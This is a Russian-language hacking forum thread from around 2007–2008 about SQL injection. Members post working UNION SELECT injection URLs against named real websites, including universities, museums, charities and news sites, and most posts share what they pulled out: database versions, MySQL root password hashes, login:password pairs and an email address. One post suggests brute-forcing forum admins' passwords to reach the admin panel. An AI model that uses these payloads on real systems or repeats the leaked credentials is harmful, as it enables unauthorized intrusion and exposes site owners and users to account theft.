SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    http://www.chemistry.gatech.edu/events/special/index.php?sID=-3+union+select+1,2,3,4,5,concat_ws(char(58),username,pw),7,8,9,10,11,12,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,33+from+user_logins/*
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.olimpauto.ru/mercedes/index.php?ob=news_one_olimp&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8/*

    4.1.22/wwwolimpautoru/olimpaut@localhost

    -----------------------------------------------------------------------------

    http://www.almatyfilmfestival.kz/index.php?mod=news&nid=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10/*

    4.1.22/affbase/affbase@localhost
    -----------------------------------------------------------------------------

    http://mosgroup-realty.ru/articles/all?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4/*

    4.1.22-standard-log/mosgrou_db01/mosgrou_user0710@localhost
    -----------------------------------------------------------------------------

    historicalcenter.ru

    http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws(0x2F,version(),database(),user()),2/*

    5.0.44-log/histcenter/histcenter@localhost



    http://historicalcenter.ru/news.php?idt=-12+union+select+concat_ws(0x2F,login,passwd,email),2+from+users+limit+0,1/*

    логин/пароль/мейл
    ss/ss/[email protected]
     
    3 people like this.
  3. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    4.1.20
    -------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
     
    1 person likes this.
  4. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    П А Д А Р К А !!!
    www.gtanf.com
    5.0.32-Debian_7etch3-log
    юзеры ~ 5к
    http://www.gtanf.com/forums/index.php?act=members
    ищем админов брутим пасс и лезем в админку
    на форуме 4 админа
     
  5. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    .AU
    PR довольно высокий.
     
    #4325 А®ТеS, 5 Jan 2008
    Last edited: 5 Jan 2008
    2 people like this.
  6. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://et.igwane.be/ Фан-сайт по игре Wolfenstein, наковырял у них 3 базы, в них 4 таблы с юзерами)

    Code:
    http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11+from+igwane_be_5.logs+limit+0,1/*
    admin:exuifoLgJGROk

    Code:
    http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11+from+igwane_be_3.eck_user+limit+0,1/*
    Code:
    http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password),5,6,7,8,9,10,11+from+igwane_be_5.members+limit+0,1/*
    Code:
    http://et.igwane.be/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11+from+igwane_be_1.et_users+limit+0,1/*
     
    3 people like this.
  7. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    isparis.edu

    HTML:
    http://www.isparis.edu/page.php?id=-18+union+select+0,1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),3,4,5,6,7,8/*'
    USER:root@localhost
    VERSION:4.1.10-nt
    DATABASE:isp

    http://www.isparis.edu/page.php?id=-18+union+select+0,1,convert(concat(user,0x3a,password)+using+latin1),3,4,5,6,7,8+from+mysql.user/*

    Таблица - mysql.user
    Поля - user,password

    root:5b3b151c66ce83e2
     
    3 people like this.
  8. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Code:
    http://www.bedehusweb.no/b/show_event.php?eid=273+union+select+1,2,3,4,concat_ws(0x3C62723E,USER(),DATABASE(),VERSION()),6,7,8,9/*
    http://www.lykkensportal.no/visartikkel.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3C62723E,USER(),DATABASE(),VERSION()),13,14,15,16/*
    =(
     
    #4328 NOmeR1, 5 Jan 2008
    Last edited: 5 Jan 2008
    2 people like this.
  9. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.lesmuseesenwallonie.be/

    Code:
    http://www.lesmuseesenwallonie.be/html/musee.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
    http://itext.ugent.be/

    Code:
    http://itext.ugent.be/library/question.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7/*
    http://www.toerismehageland.be/

    Code:
    http://www.toerismehageland.be/gemeente.php?id=-1'+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12/*
     
    3 people like this.
  10. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    http://www.gtanf.com/?page=article&id=-4853+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
    5.0.32-Debian_7etch3-log
    там ipb форум ...
     
  11. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
    4.1.20
    --------------------------------------
     
    1 person likes this.
  12. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.oxfam.org.nz/news.asp?aid=1050+or+1=@@version--
     
  13. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://fs.lan.utech.ru/index.php?p=films&pp=txt&genre=all&ru=&en=&sort_by=time&sort_order=desc&action=view&id=99999+union+select+1,2,3,4,5,0x6964,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+utech_build.relCommonBaseOrder_Material/*
     
  14. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.kras.be/

    Code:
    http://www.kras.be/ECMS_CLIENT_KRAS/configuration/pages/showalltours.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10/*
     
  15. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.arnaques.be/

    Code:
    http://www.arnaques.be/page.php?ID=-1+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*&crioc=O
    root:696efd2f4c232e84

    http://www.vrijwilligerswerk.be/

    Code:
    http://www.vrijwilligerswerk.be/nieuws/nieuws.php?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,password)+from+user/*
    http://www.jeugdrodekruis.be/

    Code:
    http://www.jeugdrodekruis.be/index.php?ID=-1+union+select+1,concat_ws(char(58),user(),version(),database()),3/*
     
    1 person likes this.
  16. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    .AU
    MsSQL
    Google PR 5
    Google PR 4
     
    1 person likes this.
  17. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    www.rollingstonemagazine.it
    Code:
    http://www.rollingstonemagazine.it/page.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11/*
    5.0.32-Debian_7etch3-log:rs_magazine@localhost:db_rs_magazine

    www.cinemadelsilenzio.it
    Code:
    http://www.cinemadelsilenzio.it/index.php?mod=film&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    5.0.22:WA_011920@localhost:cinemadelsilenzioit418

    www.rock.cs.unitn.it
    Code:
    http://rock.cs.unitn.it/dett_abstract.php?id=000-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),3/*
    4.1.11:macrina@localhost:rock
     
    5 people like this.
  18. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    www.punk.org.ua

    www.punk.org.ua
    4.1.12
    root:2be43f140bb11412
    referator:42587299301a11ad
    yack:077c36bc25937347:wattie
    punk:542fb5ca46bfbca2
     
    3 people like this.
  19. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.eric-maerschalck.be/

    Code:
    http://www.eric-maerschalck.be/Bruxelles/themes_group.php?id=-1'+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10/*
    http://www.biteback.be/

    Code:
    http://www.biteback.be/goveg/ov_detail.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3/*
     
  20. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    http://techgaz.ru/
    techgaz : *2B5D01B5C8ECF867C58B966856AD111E4589B102 : 4.1.18-log

    http://www.fotoinfo.net/
    Наугад таблицы подгонял ,чёт не получилось, если у кого получится отпишите ради интереса
     
    #4340 ILYAtirtir, 6 Jan 2008
    Last edited: 6 Jan 2008
    1 person likes this.
Thread Status:
Not open for further replies.